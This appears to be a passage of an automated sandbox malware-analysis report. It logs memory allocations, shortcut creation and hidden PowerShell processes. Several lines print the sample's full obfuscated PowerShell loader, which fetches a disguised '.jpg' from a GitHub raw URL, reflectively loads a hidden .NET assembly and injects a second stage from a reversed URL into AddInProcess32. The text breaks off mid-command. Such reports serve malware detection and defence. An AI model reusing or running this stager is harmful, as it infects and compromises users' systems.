NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02527000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0246b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02512000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02525000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02475000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02690000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02476000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0252c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02513000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02514000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02515000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02516000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02517000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02518000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02519000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028ad000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028ae000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028af000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049b1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049b3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049b4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9aW1hZ2VVcmwgPSB7MX1odHRwczovL3Jhdy5naXRodWInKyd1c2VyY29udGVudC5jb20vQ3J5cHRlcnNBbmRUb29sc09maWNpYWwvWklQL3JlZnMvaGVhZHMnKycvbWFpbi9EZScrJ3RhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaScrJ2VudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllJysnbnQ7ezB9aW1hZ2UnKydCJysneXRlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hJysnZERhdGEoezB9aW1hZ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGknKyduZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWcnKydlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0JysnX1NUQVJUPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRTY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hJysnZ2VUZXh0LkluZGV4T2YoezB9ZW5kRmxhZyk7ezB9c3RhJysncnRJbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZCcrJ2V4IC1ndCB7MH1zdGFydEluZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhcnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW4nKydndGggPSB7MH1lbmRJbicrJ2RleCAtIHswfXN0YXJ0SW5kJysnZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJJysnbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH0nKydjb20nKydtYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHswfWJhc2U2NENvbW1hbmQpO3swfWxvYWRlZCcrJ0Fzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh7MH1jbycrJ21tYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib20nKydlXS5HZXRNZXRob2QoezF9VkFJezF9KTt7JysnMH12YWlNZXRob2QuSW52Jysnb2tlKHswfW51JysnbGwsIEAoezF9dHh0LnFuYWJzb3RpdXFlZGV0YWRwdXJlZ2FuYW1vZ25hbWRldGFkJysnbmFtL2dyby5zJysnbmRrY3VkLmVlZWVsaWZ5eXl5eXlhZHNydWh0Ly86cHR0aHsxfSwgezF9ZGVzJysnYXRpdmFkb3sxfSwgezF9ZGVzYScrJ3RpdmFkb3sxfSwgezF9ZGVzJysnYXRpdmFkb3sxfSwgezF9QWRkSW5Qcm9jZXNzMzJ7MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWRlc2F0aXZhZG97MX0pKTsnKSAgLWZbY0hhcl0zNixbY0hhcl0zOSkgfCAmKCAkZU5WOmNvbVNQRUNbNCwyNCwyNV0tSk9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}imageUrl = {1}https://raw.github'+'usercontent.com/CryptersAndToolsOficial/ZIP/refs/heads'+'/main/De'+'tahNote_V.jpg {1};{0}webCli'+'ent = New-Object Sy'+'stem.Net.WebClie'+'nt;{0}image'+'B'+'ytes = {0}webClient.Downloa'+'dData({0}imageUrl);{0}imageText = [System.Text.Encodi'+'ng]::UTF8.GetString('+'{0}imag'+'eBytes);{0}startFlag = {1}<<BASE64'+'_START>>{1};{0}endFlag = {1}<<BASE64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}ima'+'geText.IndexOf({0}endFlag);{0}sta'+'rtIndex -ge 0 -and {0}endInd'+'ex -gt {0}startIndex;{0}startIndex += {0}startFlag.Length;{0}base64Len'+'gth = {0}endIn'+'dex - {0}startInd'+'ex;{0}base64Command = {0}imageText.Substring({0}startI'+'ndex, {0}base64Length);{0}'+'com'+'mandBytes = [System.Convert]::FromBase64String({0}base64Command);{0}loaded'+'Assembly = [System.Reflection.Assembly]::Load({0}co'+'mmandBytes);{0}vaiMethod = [dnlib.IO.Hom'+'e].GetMethod({1}VAI{1});{'+'0}vaiMethod.Inv'+'oke({0}nu'+'ll, @({1}txt.qnabsotiuqedetadpureganamognamdetad'+'nam/gro.s'+'ndkcud.eeeelifyyyyyyadsruht//:ptth{1}, {1}des'+'ativado{1}, {1}desa'+'tivado{1}, {1}des'+'ativado{1}, {1}AddInProcess32{1}, {1}desativado{1}, {1}desativado{1}));') -f[cHar]36,[cHar]39) \| &( $eNV:comSPEC[4,24,25]-JOIn'')"
cmdline	powershell -command $Codigo = 'KCgnezB9aW1hZ2VVcmwgPSB7MX1odHRwczovL3Jhdy5naXRodWInKyd1c2VyY29udGVudC5jb20vQ3J5cHRlcnNBbmRUb29sc09maWNpYWwvWklQL3JlZnMvaGVhZHMnKycvbWFpbi9EZScrJ3RhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaScrJ2VudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllJysnbnQ7ezB9aW1hZ2UnKydCJysneXRlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hJysnZERhdGEoezB9aW1hZ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGknKyduZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWcnKydlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0JysnX1NUQVJUPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRTY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hJysnZ2VUZXh0LkluZGV4T2YoezB9ZW5kRmxhZyk7ezB9c3RhJysncnRJbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZCcrJ2V4IC1ndCB7MH1zdGFydEluZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhcnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW4nKydndGggPSB7MH1lbmRJbicrJ2RleCAtIHswfXN0YXJ0SW5kJysnZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJJysnbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH0nKydjb20nKydtYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHswfWJhc2U2NENvbW1hbmQpO3swfWxvYWRlZCcrJ0Fzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh7MH1jbycrJ21tYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib20nKydlXS5HZXRNZXRob2QoezF9VkFJezF9KTt7JysnMH12YWlNZXRob2QuSW52Jysnb2tlKHswfW51JysnbGwsIEAoezF9dHh0LnFuYWJzb3RpdXFlZGV0YWRwdXJlZ2FuYW1vZ25hbWRldGFkJysnbmFtL2dyby5zJysnbmRrY3VkLmVlZWVsaWZ5eXl5eXlhZHNydWh0Ly86cHR0aHsxfSwgezF9ZGVzJysnYXRpdmFkb3sxfSwgezF9ZGVzYScrJ3RpdmFkb3sxfSwgezF9ZGVzJysnYXRpdmFkb3sxfSwgezF9QWRkSW5Qcm9jZXNzMzJ7MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWRlc2F0aXZhZG97MX0pKTsnKSAgLWZbY0hhcl0zNixbY0hhcl0zOSkgfCAmKCAkZU5WOmNvbVNQRUNbNCwyNCwyNV0tSk9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Oct. 18, 2024, 9:54 a.m.	thread_identifier: 2084 thread_handle: 0x000002f0 process_identifier: 2080 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9aW1hZ2VVcmwgPSB7MX1odHRwczovL3Jhdy5naXRodWInKyd1c2VyY29udGVudC5jb20vQ3J5cHRlcnNBbmRUb29sc09maWNpYWwvWklQL3JlZnMvaGVhZHMnKycvbWFpbi9EZScrJ3RhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaScrJ2VudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllJysnbnQ7ezB9aW1hZ2UnKydCJysneXRlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hJysnZERhdGEoezB9aW1hZ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGknKyduZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWcnKydlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0JysnX1NUQVJUPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRTY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hJysnZ2VUZXh0LkluZGV4T2YoezB9ZW5kRmxhZyk7ezB9c3RhJysncnRJbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZCcrJ2V4IC1ndCB7MH1zdGFydEluZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhcnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW4nKydndGggPSB7MH1lbmRJbicrJ2RleCAtIHswfXN0YXJ0SW5kJysnZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJJysnbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH0nKydjb20nKydtYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHswfWJhc2U2NENvbW1hbmQpO3swfWxvYWRlZCcrJ0Fzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh7MH1jbycrJ21tYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib20nKydlXS5HZXRNZXRob2QoezF9VkFJezF9KTt7JysnMH12YWlNZXRob2QuSW52Jysnb2tlKHswfW51JysnbGwsIEAoezF9dHh0LnFuYWJzb3RpdXFlZGV0YWRwdXJlZ2FuYW1vZ25hbWRldGFkJysnbmFtL2dyby5zJysnbmRrY3VkLmVlZWVsaWZ5eXl5eXlhZHNydWh0Ly86cHR0aHsxfSwgezF9ZGVzJysnYXRpdmFkb3sxfSwgezF9ZGVzYScrJ3RpdmFkb3sxfSwgezF9ZGVzJysnYXRpdmFkb3sxfSwgezF9QWRkSW5Qcm9jZXNzMzJ7MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWRlc2F0aXZhZG97MX0pKTsnKSAgLWZbY0hhcl0zNixbY0hhcl0zOSkgfCAmKCAkZU5WOmNvbVNQRUNbNCwyNCwyNV0tSk9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002f8	1	1
ShellExecuteExW Oct. 18, 2024, 9:54 a.m.	show_type: 0 filepath_r: powershell parameters: -command $Codigo = 'KCgnezB9aW1hZ2VVcmwgPSB7MX1odHRwczovL3Jhdy5naXRodWInKyd1c2VyY29udGVudC5jb20vQ3J5cHRlcnNBbmRUb29sc09maWNpYWwvWklQL3JlZnMvaGVhZHMnKycvbWFpbi9EZScrJ3RhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaScrJ2VudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllJysnbnQ7ezB9aW1hZ2UnKydCJysneXRlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hJysnZERhdGEoezB9aW1hZ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGknKyduZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWcnKydlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0JysnX1NUQVJUPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRTY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hJysnZ2VUZXh0LkluZGV4T2YoezB9ZW5kRmxhZyk7ezB9c3RhJysncnRJbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZCcrJ2V4IC1ndCB7MH1zdGFydEluZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhcnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW4nKydndGggPSB7MH1lbmRJbicrJ2RleCAtIHswfXN0YXJ0SW5kJysnZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJJysnbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH0nKydjb20nKydtYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHswfWJhc2U2NENvbW1hbmQpO3swfWxvYWRlZCcrJ0Fzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh7MH1jbycrJ21tYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib20nKydlXS5HZXRNZXRob2QoezF9VkFJezF9KTt7JysnMH12YWlNZXRob2QuSW52Jysnb2tlKHswfW51JysnbGwsIEAoezF9dHh0LnFuYWJzb3RpdXFlZGV0YWRwdXJlZ2FuYW1vZ25hbWRldGFkJysnbmFtL2dyby5zJysnbmRrY3VkLmVlZWVsaWZ5eXl5eXlhZHNydWh0Ly86cHR0aHsxfSwgezF9ZGVzJysnYXRpdmFkb3sxfSwgezF9ZGVzYScrJ3RpdmFkb3sxfSwgezF9ZGVzJysnYXRpdmFkb3sxfSwgezF9QWRkSW5Qcm9jZXNzMzJ7MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWRlc2F0aXZhZG97MX0pKTsnKSAgLWZbY0hhcl0zNixbY0hhcl0zOSkgfCAmKCAkZU5WOmNvbVNQRUNbNCwyNCwyNV0tSk9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD filepath: powershell	1	1
CreateProcessInternalW Oct. 18, 2024, 9:54 a.m.	thread_identifier: 2208 thread_handle: 0x0000044c process_identifier: 2204 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}imageUrl = {1}https://raw.github'+'usercontent.com/CryptersAndToolsOficial/ZIP/refs/heads'+'/main/De'+'tahNote_V.jpg {1};{0}webCli'+'ent = New-Object Sy'+'stem.Net.WebClie'+'nt;{0}image'+'B'+'ytes = {0}webClient.Downloa'+'dData({0}imageUrl);{0}imageText = [System.Text.Encodi'+'ng]::UTF8.GetString('+'{0}imag'+'eBytes);{0}startFlag = {1}<<BASE64'+'_START>>{1};{0}endFlag = {1}<<BASE64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}ima'+'geText.IndexOf({0}endFlag);{0}sta'+'rtIndex -ge 0 -and {0}endInd'+'ex -gt {0}startIndex;{0}startIndex += {0}startFlag.Length;{0}base64Len'+'gth = {0}endIn'+'dex - {0}startInd'+'ex;{0}base64Command = {0}imageText.Substring({0}startI'+'ndex, {0}base64Length);{0}'+'com'+'mandBytes = [System.Convert]::FromBase64String({0}base64Command);{0}loaded'+'Assembly = [System.Reflection.Assembly]::Load({0}co'+'mmandBytes);{0}vaiMethod = [dnlib.IO.Hom'+'e].GetMethod({1}VAI{1});{'+'0}vaiMethod.Inv'+'oke({0}nu'+'ll, 